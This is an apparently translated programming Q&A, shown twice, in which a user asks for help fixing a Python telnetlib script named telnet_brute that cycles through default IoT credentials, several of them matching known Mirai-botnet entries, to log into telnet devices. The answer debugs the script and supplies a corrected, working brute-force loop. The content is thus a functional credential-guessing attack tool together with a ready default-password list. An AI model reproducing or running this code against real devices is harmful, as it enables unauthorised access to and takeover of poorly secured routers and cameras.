通过遍历元组读取用户名和密码
Read username and password by iterating through a tuple
我正在尝试使用 python3 telnetlib 库连接到设备,而不是指定单个 username/password(如下所示),我想从元组,并遍历它们直到找到匹配项。
下面是使用单个用户名使用 telnetlib 的示例。
import telnetlib
import sys
import getpass
bot = telnetlib.Telnet("192.168.1.128")
bot.read_until(b"login: ")
bot.write(("pi\n").encode('ascii'))
bot.read_until(b"Password: ")
bot.write(("pass12345\n").encode('ascii'))
我已经尝试了下面的方法,但是脚本确实连接了,但只尝试了第一个用户名和密码,然后在没有尝试任何其他凭据的情况下挂起。
非常感谢任何帮助。
passwords = [('root', 'xc3511'), ('pi', 'raspberry'), ('pi', 'raspberry'),('admin', 'admin'), ('root', '888888'), ('root', 'xmhdipc'), ('root', 'default'), ('root', 'juantech'), ('root', '123456'), ('root', '54321'), ('support', 'support')]
def telnet_brute():
print("Trying to authenticate to the telnet server")
tn = telnetlib.Telnet('192.168.0.131', timeout=10)
ip = '192.168.0.131'
passwordAttempts = 0
for tuples in passwords:
passwordAttempts = passwordAttempts + 1
print('[*] Password attempt ' + str(passwordAttempts) + ' on device ' + str(ip))
try:
tn.expect([b"Login: ", b"login: "], 5)
tn.write(tuples[0].encode('ascii') + b"\r\n")
tn.expect([b"Password: ", b"password"], 5)
tn.write(tuples[1].encode('ascii') + b"\r\n")
tn.read_all().decode('ascii')
(i, obj, res) = tn.expect([b"Login Incorrect", b"Login incorrect"], 5)
if i != -1:
print("Exploit failed")
else:
if any(map(lambda x: x in res, [b"#", b"$", b"~$", b" "])):
print("Login successful:",tuples[0], tuples[1])
break
else:
print("Exploit failed")
tn.close()
except Exception as e:
print(f"Connection error: {e}")
if __name__ == '__main__':
telnet_brute()
您的代码抛出异常并通过中断 for 循环在 except 块中处理并静默结束,这就是您的程序仅尝试第一个用户名和密码的原因。
所以作为了解发生了什么的第一步你应该用 print(e)
替换 break 语句
except Exception as e:
print(e)
我没有尝试你的代码,但看起来名称 'password' 没有在这一行中定义:
if password:
更新的答案:
passwords = [('root', 'xc3511'), ('root', 'vizxv'), ('root', 'admin'),('admin', 'admin'), ('root', '888888'), ('root', 'xmhdipc'), ('root', 'default'), ('root', 'juantech'), ('root', '123456'), ('root', '54321'), ('support', 'support')]
def telnet_brute():
print("Trying to authenticate to the telnet server")
tn = telnetlib.Telnet('192.168.0.130', timeout=10)
ip = '192.168.0.130'
passwordAttempts = 0
for tuples in passwords:
passwordAttempts = passwordAttempts + 1
print('[*] Password attempt ' + str(passwordAttempts) + ' on device ' + str(ip))
try:
tn.expect([b"Login: ", b"login: "], 5)
tn.write(tuples[0].encode('ascii') + b"\r\n")
tn.expect(["Password: ", "password"], 5)
tn.write(tuples[1].encode('ascii') + b"\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
if i != -1:
print("Incorrect password or username")
else:
if any(map(lambda x: x in res, [b"#", b"$", b">"])) or len(res) > 500:
print(f"Login successful: {tuples[0]}, {tuples[1]}")
tn.write(b"exit\n")
print(tn.read_all())
break
else:
print(f"got this res after login:\n{res}")
tn.close()
except Exception as e:
print(f"Connection error: {e}")
if __name__ == '__main__':
telnet_brute()
我正在尝试使用 python3 telnetlib 库连接到设备,而不是指定单个 username/password(如下所示),我想从元组,并遍历它们直到找到匹配项。
下面是使用单个用户名使用 telnetlib 的示例。
import telnetlib
import sys
import getpass
bot = telnetlib.Telnet("192.168.1.128")
bot.read_until(b"login: ")
bot.write(("pi\n").encode('ascii'))
bot.read_until(b"Password: ")
bot.write(("pass12345\n").encode('ascii'))
我已经尝试了下面的方法,但是脚本确实连接了,但只尝试了第一个用户名和密码,然后在没有尝试任何其他凭据的情况下挂起。
非常感谢任何帮助。
passwords = [('root', 'xc3511'), ('pi', 'raspberry'), ('pi', 'raspberry'),('admin', 'admin'), ('root', '888888'), ('root', 'xmhdipc'), ('root', 'default'), ('root', 'juantech'), ('root', '123456'), ('root', '54321'), ('support', 'support')]
def telnet_brute():
print("Trying to authenticate to the telnet server")
tn = telnetlib.Telnet('192.168.0.131', timeout=10)
ip = '192.168.0.131'
passwordAttempts = 0
for tuples in passwords:
passwordAttempts = passwordAttempts + 1
print('[*] Password attempt ' + str(passwordAttempts) + ' on device ' + str(ip))
try:
tn.expect([b"Login: ", b"login: "], 5)
tn.write(tuples[0].encode('ascii') + b"\r\n")
tn.expect([b"Password: ", b"password"], 5)
tn.write(tuples[1].encode('ascii') + b"\r\n")
tn.read_all().decode('ascii')
(i, obj, res) = tn.expect([b"Login Incorrect", b"Login incorrect"], 5)
if i != -1:
print("Exploit failed")
else:
if any(map(lambda x: x in res, [b"#", b"$", b"~$", b" "])):
print("Login successful:",tuples[0], tuples[1])
break
else:
print("Exploit failed")
tn.close()
except Exception as e:
print(f"Connection error: {e}")
if __name__ == '__main__':
telnet_brute()
您的代码抛出异常并通过中断 for 循环在 except 块中处理并静默结束,这就是您的程序仅尝试第一个用户名和密码的原因。 所以作为了解发生了什么的第一步你应该用 print(e)
替换 break 语句except Exception as e:
print(e)
我没有尝试你的代码,但看起来名称 'password' 没有在这一行中定义:
if password:
更新的答案:
passwords = [('root', 'xc3511'), ('root', 'vizxv'), ('root', 'admin'),('admin', 'admin'), ('root', '888888'), ('root', 'xmhdipc'), ('root', 'default'), ('root', 'juantech'), ('root', '123456'), ('root', '54321'), ('support', 'support')]
def telnet_brute():
print("Trying to authenticate to the telnet server")
tn = telnetlib.Telnet('192.168.0.130', timeout=10)
ip = '192.168.0.130'
passwordAttempts = 0
for tuples in passwords:
passwordAttempts = passwordAttempts + 1
print('[*] Password attempt ' + str(passwordAttempts) + ' on device ' + str(ip))
try:
tn.expect([b"Login: ", b"login: "], 5)
tn.write(tuples[0].encode('ascii') + b"\r\n")
tn.expect(["Password: ", "password"], 5)
tn.write(tuples[1].encode('ascii') + b"\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
if i != -1:
print("Incorrect password or username")
else:
if any(map(lambda x: x in res, [b"#", b"$", b">"])) or len(res) > 500:
print(f"Login successful: {tuples[0]}, {tuples[1]}")
tn.write(b"exit\n")
print(tn.read_all())
break
else:
print(f"got this res after login:\n{res}")
tn.close()
except Exception as e:
print(f"Connection error: {e}")
if __name__ == '__main__':
telnet_brute()